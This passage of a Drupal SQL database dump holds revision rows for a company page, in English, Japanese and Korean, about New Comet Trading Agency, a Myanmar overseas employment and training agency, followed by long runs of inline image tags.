data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 305, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img data-entity-uuid=\"fdb82619-ca1a-4347-ad15-71c283cda59b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img data-entity-uuid=\"43d414b0-75e3-40e5-b535-eb8bc91ae947\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"a74c9c3b-1631-4c0f-8750-7543e24d67be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"0611b3a9-c229-444d-906e-d6401ae82458\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2de69b23-8c4f-473c-b679-a074892f3b85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a605b5f-2bff-4071-addf-6b65cfd37a53\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_5.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img data-entity-uuid=\"08a12c29-83b6-46ca-b835-84f7f6270b3d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"1ffe4d12-0ef2-42f1-a14c-683cff75bd4c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 305, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img data-entity-uuid=\"fc1b0cae-8888-42ef-b289-eab7a62c114f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img data-entity-uuid=\"f46df6c8-2062-4477-94ba-4f7bdcb72096\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"5a38eb75-558d-43dc-b395-6e85f75cfa9d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_3.jpg\" data-align=\"center\"><img data-entity-uuid=\"a5fa3a82-69bd-4cad-8cce-a8e6cfdfaa4d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"627e8ddc-1573-4932-a000-86f210583339\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_6.jpg\" data-align=\"center\"><img data-entity-uuid=\"816827e9-8b4f-4529-a4ef-3a9efd261c46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_6.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img data-entity-uuid=\"26718e0e-5474-4cfe-a694-aa62fbfcb114\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"56e3de67-e8a5-47c1-b147-c73010cfdc6d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 305, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.<br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.<br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.<br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.&nbsp;<br>또한, 두바이, 말레이시아, 싱가포르, 태국, 일본, 그리고 한국 등과 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 갖을 수 있도록 &nbsp;서비스를 제공하고 있습니다.<br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.<br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.<br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\" data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\" data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\" data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\" data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\" data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\" data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\" data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 306, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img data-entity-uuid=\"fdb82619-ca1a-4347-ad15-71c283cda59b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img data-entity-uuid=\"43d414b0-75e3-40e5-b535-eb8bc91ae947\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"a74c9c3b-1631-4c0f-8750-7543e24d67be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"0611b3a9-c229-444d-906e-d6401ae82458\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2de69b23-8c4f-473c-b679-a074892f3b85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a605b5f-2bff-4071-addf-6b65cfd37a53\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_5.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" 